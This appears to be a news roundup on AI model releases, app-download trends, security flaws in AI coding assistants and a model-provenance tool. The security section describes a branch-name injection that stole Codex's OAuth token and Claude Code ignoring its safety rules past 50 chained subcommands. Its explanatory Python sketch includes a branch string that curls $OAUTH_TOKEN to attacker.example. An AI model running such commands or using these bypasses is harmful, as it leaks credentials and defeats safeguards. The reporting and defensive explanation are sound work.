American AI startup Poolside on Tuesday released Laguna XS.2, a free, open-source model optimized for agentic coding workflows: it can write code, use third-party tools, and take autonomous actions. According to VentureBeat, the San Francisco-based company, founded in 2023, launched two new Laguna large language models alongside a coding agent harness called “pool” and a web-based development environment named “shimmer.”
The release comes as Chinese companies like DeepSeek and Xiaomi have dominated the open source AI space with high-performance, low-cost models that rival proprietary offerings from OpenAI and Anthropic.
https://x.com/eisokant/status/2049142230397370537
Image Models Drive Mobile App Growth
Image generation capabilities now drive significantly more mobile app downloads than traditional text model updates, according to new data from Appfigures. TechCrunch reported that image model releases generate 6.5x more downloads than conversational model upgrades, marking a shift from earlier adoption patterns.
Google’s Gemini app added over 22 million downloads in the 28 days following its Gemini 2.5 Flash image model release in August 2025, representing a 4x increase in downloads over that period. ChatGPT saw similar gains with over 12 million incremental installs after introducing its GPT-4o image model in March 2025, roughly 4.5x more downloads than its text-only model releases.
Meta AI’s video model “Vibes” generated an estimated 2.6 million additional downloads within 28 days of its September 2025 release, though the report noted that increased downloads don’t always translate to higher mobile revenue.
SenseTime Releases Speed-Optimized Image Model
Chinese AI company SenseTime launched SenseNova U1, an open source model that processes images directly without converting them to text first, significantly reducing computing requirements. Wired reported that the sanctioned company claims U1 can generate and interpret images faster than leading US competitors.
“The model’s entire reasoning process is no longer limited to text. It can reason with images as well,” Dahua Lin, SenseTime’s cofounder and chief scientist, told Wired. The company designed U1 to run on Chinese-made chips, with 10 domestic chipmakers including Cambricon and Biren Technology announcing hardware support on launch day.
SenseTime released U1 for free on Hugging Face and GitHub, continuing the trend of Chinese companies contributing extensively to open source AI development. The model’s direct image processing capability could enable robots to better understand physical environments, according to Lin.
Security Vulnerabilities Target AI Coding Credentials
Multiple security researchers have exposed critical vulnerabilities in AI coding assistants, with every exploit targeting authentication credentials rather than the models themselves. VentureBeat reported that six research teams disclosed exploits against Codex, Claude Code, Copilot, and Vertex AI over nine months, following identical attack patterns.
BeyondTrust researchers demonstrated in March that a crafted GitHub branch name could steal Codex’s OAuth token in cleartext, a flaw OpenAI classified as Critical P1. Days later, Claude Code’s source code leaked onto the public npm registry, and Adversa found the system ignored its own security rules when a command chained more than 50 subcommands.
Merritt Baer, CSO at Enkrypt AI and former Deputy CISO at AWS, explained the core issue: “Enterprises believe they’ve ‘approved’ AI vendors, but what they’ve actually approved is an interface, not the underlying system.” The underlying credentials remain the primary attack vector.
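The attack class described above, untrusted input such as a branch name spliced into a shell command that runs with the agent's credentials in scope, can be illustrated with a minimal sketch. This is hypothetical code, not OpenAI's actual implementation, and the branch name and exfiltration URL are invented:

```python
import shlex

# A crafted branch name of the kind BeyondTrust described: if this string
# is interpolated into a shell command, everything after ";" executes too,
# exfiltrating whatever token sits in the environment. (Invented example.)
MALICIOUS_BRANCH = "main; curl https://attacker.example/?t=$OAUTH_TOKEN"

def build_checkout_unsafe(branch: str) -> str:
    # VULNERABLE: string interpolation lets the branch name inject extra
    # shell commands if this string is later run with shell=True.
    return f"git checkout {branch}"

def build_checkout_safe(branch: str) -> list[str]:
    # SAFE: an argv list is passed to git directly, so the branch name is
    # treated as data, not code; "--" also stops option parsing.
    return ["git", "checkout", "--", branch]

def build_checkout_quoted(branch: str) -> str:
    # If a shell is unavoidable, shlex.quote() neutralizes metacharacters.
    return f"git checkout -- {shlex.quote(branch)}"
```

The pattern generalizes: every exploit in the report abused a path where untrusted data reached a context (shell, registry, config) that implicitly trusted it.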
Cisco Addresses AI Model Provenance Issues
Cisco released Model Provenance Kit, an open source tool designed to help organizations track and verify third-party AI models from repositories like Hugging Face. SecurityWeek reported that the tool addresses security, compliance, and liability risks associated with unverified model claims and inadequate documentation.
Organizations frequently deploy models without tracking modifications or verifying developer claims about sources, vulnerabilities, and training biases. According to Cisco, these gaps can lead to the deployment of poisoned or manipulated models, creating downstream security risks in internal chatbots, agent applications, and customer-facing tools.
The tool aims to provide model lineage tracking for incident response and remediation, while addressing licensing and regulatory compliance requirements. Government mandates for AI system documentation make provenance tracking increasingly critical for enterprise deployments.
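The core check this kind of provenance tooling performs can be approximated in a few lines: compare a downloaded artifact's checksum against a hash published by the model's maintainer. This is a generic sketch, not Cisco's actual tool, and the file contents and hashes are illustrative:

```python
import hashlib
from pathlib import Path

def sha256_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream the file in chunks so multi-gigabyte weights fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_artifact(path: Path, expected_sha256: str) -> bool:
    # A mismatch means the weights differ from what the publisher vouched
    # for: a re-upload, a silent modification, or a poisoned copy.
    return sha256_of(path) == expected_sha256.lower()
```

Real provenance systems layer signatures and lineage metadata on top of this, but the checksum comparison is the step that catches a tampered download before it reaches a chatbot or agent pipeline.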
What This Means
The AI model landscape shows three distinct trends emerging simultaneously. American companies like Poolside are entering the open source competition previously dominated by Chinese firms, potentially reshaping the narrative that only Chinese companies can deliver high-performance, affordable AI models.
Image and visual processing capabilities have become the primary driver of consumer adoption, suggesting users find immediate practical value in visual AI over conversational improvements. This shift indicates that multimodal capabilities, not just text generation quality, determine market success.
Security concerns around AI coding assistants reveal a fundamental architecture problem where credentials, not models, represent the primary attack surface. As enterprises integrate more AI tools into development workflows, the focus must shift from model security to credential management and authentication protocols.
FAQ
What makes Poolside’s Laguna XS.2 different from other coding models?
Laguna XS.2 is optimized specifically for agentic workflows, meaning it can autonomously write code, use third-party tools, and take actions beyond simple code generation. It is also free and open source, competing with Chinese open models on cost while being developed by a US company.
Why are image models driving more app downloads than text models?
Image generation provides immediate, visible value that users can easily understand and share, while text model improvements are often incremental and less noticeable. Visual content creation appeals to broader audiences beyond technical users who primarily benefited from conversational AI improvements.
How serious are the security vulnerabilities in AI coding assistants?
The vulnerabilities are critical because they target authentication credentials that provide direct access to production systems. Unlike traditional software bugs, these exploits can compromise entire development environments and repositories without requiring user interaction, making them particularly dangerous for enterprise deployments.
Related news
- NVIDIA Isaac GR00T N1.7: Open Reasoning VLA Model for Humanoid Robots – HuggingFace Blog
- DenseOn with the LateOn: Open State-of-the-Art Single and Multi-Vector Models – HuggingFace Blog